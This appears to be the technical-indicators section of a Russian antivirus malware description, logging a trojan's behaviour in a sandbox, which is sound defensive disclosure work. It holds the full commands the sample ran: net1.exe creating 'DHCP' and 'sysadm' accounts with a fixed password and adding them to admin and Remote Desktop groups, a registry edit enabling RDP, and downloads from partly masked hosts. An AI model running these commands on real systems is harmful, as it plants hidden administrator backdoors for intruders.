Техническая информация
- '%TEMP%\winlog.exe'
- '%TEMP%\winlog.exe' (загружен из сети Интернет)
- '<SYSTEM32>\net1.exe' group "domain admins" DHCP /add
- '<SYSTEM32>\net1.exe' localgroup "remote desktop users" DHCP /add
- '<SYSTEM32>\net1.exe' localgroup %USERNAME%s DHCP /add
- '<SYSTEM32>\net1.exe' user DHCP /active:yes
- '<SYSTEM32>\reg.exe' add "hklm\system\currentcontrolset\control\terminal server" /v fdenytsconnections /t reg_dword /d 0 /f
- '<SYSTEM32>\net1.exe' user DHCP h3lp_desk
- '<SYSTEM32>\net1.exe' user DHCP /expires:never
- '<SYSTEM32>\net1.exe' user DHCP h3lp_desk /expires:never /add
- '<SYSTEM32>\net1.exe' localgroup "remote desktop users" sysadm /add
- '<SYSTEM32>\net1.exe' localgroup %USERNAME%s sysadm /add
- '<SYSTEM32>\net1.exe' user sysadm h3lp_desk /expires:never /add
- '<SYSTEM32>\net1.exe' group "domain admins" sysadm /add
- '<SYSTEM32>\net1.exe' user sysadm h3lp_desk
- '<SYSTEM32>\net1.exe' user sysadm /expires:never
- '<SYSTEM32>\net1.exe' user sysadm /active:yes
- AVP.EXE
- %HOMEPATH%\Local Settings\Temporary Internet Files\Content.IE5\U98D4X8H\men9[1].png
- %TEMP%\winlog.exe
- %HOMEPATH%\Local Settings\Temporary Internet Files\Content.IE5\KHMHGZ4F\logo5[1].png
- %TEMP%\task.ini
- 'www.fi######ternational.com.tw':80
- 'fo#####travel.com.my':80
- www.fi######ternational.com.tw/images/men9.png
- fo#####travel.com.my/images/logo5.png
- DNS ASK www.fi######ternational.com.tw
- DNS ASK fo#####travel.com.my
- ClassName: 'Shell_TrayWnd' WindowName: '(null)'